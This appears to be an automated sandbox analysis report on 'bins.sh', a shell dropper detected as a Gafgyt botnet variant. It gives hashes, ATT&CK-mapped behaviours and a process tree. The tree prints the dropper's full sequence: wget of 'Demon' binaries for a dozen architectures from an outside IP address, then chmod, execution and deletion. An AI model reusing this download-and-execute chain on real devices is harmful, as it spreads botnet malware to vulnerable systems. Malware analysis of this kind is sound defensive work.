Analysis
-
max time kernel
13s -
max time network
15s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
19-10-2024 11:41
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral8
Sample
bins.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
bins.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
bins.sh
-
Size
2KB
-
MD5
a754f4cf9d6ba2d574cd90bf04d1bc35
-
SHA1
b0191e89c26057b6132f3314fa685e1879c7dc62
-
SHA256
bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
-
SHA512
600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Malware Config
Signatures
-
Detected Gafgyt variant 1 IoCs
Processes:
resource yara_rule /tmp/Demon.mips family_gafgyt -
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 703 chmod 718 chmod 740 chmod 800 chmod 806 chmod 686 chmod 679 chmod 750 chmod 759 chmod 775 chmod 793 chmod 668 chmod -
Executes dropped EXE 1 IoCs
Processes:
Demon.mipsioc pid process /tmp/Demon.mips 670 Demon.mips -
Reads system routing table 1 TTPs 3 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
Demon.arm6Demon.arm4Demon.arm5description ioc process File opened for reading /proc/net/route Demon.arm6 File opened for reading /proc/net/route Demon.arm4 File opened for reading /proc/net/route Demon.arm5 -
Changes its process name 3 IoCs
Processes:
Demon.arm6Demon.arm4Demon.arm5description pid process Changes the process name, possibly in an attempt to hide itself 720 Demon.arm6 Changes the process name, possibly in an attempt to hide itself 801 Demon.arm4 Changes the process name, possibly in an attempt to hide itself 807 Demon.arm5 -
Reads system network configuration 1 TTPs 3 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
Demon.arm4Demon.arm5Demon.arm6description ioc process File opened for reading /proc/net/route Demon.arm4 File opened for reading /proc/net/route Demon.arm5 File opened for reading /proc/net/route Demon.arm6 -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
Demon.mipsrmwgetpid process 670 Demon.mips 672 rm 646 wget -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc process File opened for modification /tmp/Demon.mpsl wget File opened for modification /tmp/Demon.sh4 wget File opened for modification /tmp/Demon.arm6 wget File opened for modification /tmp/Demon.m68k wget File opened for modification /tmp/Demon.arm4 wget File opened for modification /tmp/Demon.mips wget File opened for modification /tmp/Demon.x86 wget File opened for modification /tmp/Demon.i686 wget File opened for modification /tmp/Demon.ppc wget File opened for modification /tmp/Demon.i586 wget File opened for modification /tmp/Demon.sparc wget File opened for modification /tmp/Demon.arm5 wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:644
-
/usr/bin/wgetwget http://38.123.149.216/Demon.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:646 -
/bin/chmodchmod +x Demon.mips2⤵
- File and Directory Permissions Modification
PID:668 -
/tmp/Demon.mips./Demon.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:670 -
/bin/rmrm -rf Demon.mips2⤵
- System Network Configuration Discovery
PID:672 -
/usr/bin/wgetwget http://38.123.149.216/Demon.mpsl2⤵
- Writes file to tmp directory
PID:674 -
/bin/chmodchmod +x Demon.mpsl2⤵
- File and Directory Permissions Modification
PID:679 -
/tmp/Demon.mpsl./Demon.mpsl2⤵PID:680
-
/bin/rmrm -rf Demon.mpsl2⤵PID:682
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sh42⤵
- Writes file to tmp directory
PID:683 -
/bin/chmodchmod +x Demon.sh42⤵
- File and Directory Permissions Modification
PID:686 -
/tmp/Demon.sh4./Demon.sh42⤵PID:687
-
/bin/rmrm -rf Demon.sh42⤵PID:690
-
/usr/bin/wgetwget http://38.123.149.216/Demon.x862⤵
- Writes file to tmp directory
PID:692 -
/bin/chmodchmod +x Demon.x862⤵
- File and Directory Permissions Modification
PID:703 -
/tmp/Demon.x86./Demon.x862⤵PID:704
-
/bin/rmrm -rf Demon.x862⤵PID:706
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm62⤵
- Writes file to tmp directory
PID:708 -
/bin/chmodchmod +x Demon.arm62⤵
- File and Directory Permissions Modification
PID:718 -
/tmp/Demon.arm6./Demon.arm62⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:720 -
/bin/rmrm -rf Demon.arm62⤵PID:723
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i6862⤵
- Writes file to tmp directory
PID:725 -
/bin/chmodchmod +x Demon.i6862⤵
- File and Directory Permissions Modification
PID:740 -
/tmp/Demon.i686./Demon.i6862⤵PID:741
-
/bin/rmrm -rf Demon.i6862⤵PID:744
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc2⤵
- Writes file to tmp directory
PID:745 -
/bin/chmodchmod +x Demon.ppc2⤵
- File and Directory Permissions Modification
PID:750 -
/tmp/Demon.ppc./Demon.ppc2⤵PID:751
-
/bin/rmrm -rf Demon.ppc2⤵PID:753
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i5862⤵
- Writes file to tmp directory
PID:754 -
/bin/chmodchmod +x Demon.i5862⤵
- File and Directory Permissions Modification
PID:759 -
/tmp/Demon.i586./Demon.i5862⤵PID:760
-
/bin/rmrm -rf Demon.i5862⤵PID:763
-
/usr/bin/wgetwget http://38.123.149.216/Demon.m68k2⤵
- Writes file to tmp directory
PID:764 -
/bin/chmodchmod +x Demon.m68k2⤵
- File and Directory Permissions Modification
PID:775 -
/tmp/Demon.m68k./Demon.m68k2⤵PID:776
-
/bin/rmrm -rf Demon.m68k2⤵PID:779
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sparc2⤵
- Writes file to tmp directory
PID:780 -
/bin/chmodchmod +x Demon.sparc2⤵
- File and Directory Permissions Modification
PID:793 -
/tmp/Demon.sparc./Demon.sparc2⤵PID:794
-
/bin/rmrm -rf Demon.sparc2⤵PID:796
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm42⤵
- Writes file to tmp directory
PID:797 -
/bin/chmodchmod +x Demon.arm42⤵
- File and Directory Permissions Modification
PID:800 -
/tmp/Demon.arm4./Demon.arm42⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:801 -
/bin/rmrm -rf Demon.arm42⤵PID:804
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm52⤵
- Writes file to tmp directory
PID:805 -
/bin/chmodchmod +x Demon.arm52⤵
- File and Directory Permissions Modification
PID:806 -
/tmp/Demon.arm5./Demon.arm52⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:807 -
/bin/rmrm -rf Demon.arm52⤵PID:810
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm72⤵PID:811
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
211KB
MD5455a2acf75de8da6ab7c4d9564cc69f9
SHA19e6016c6581289e685bcd6392bbf0bcf6b1182ff
SHA256b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
SHA512a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab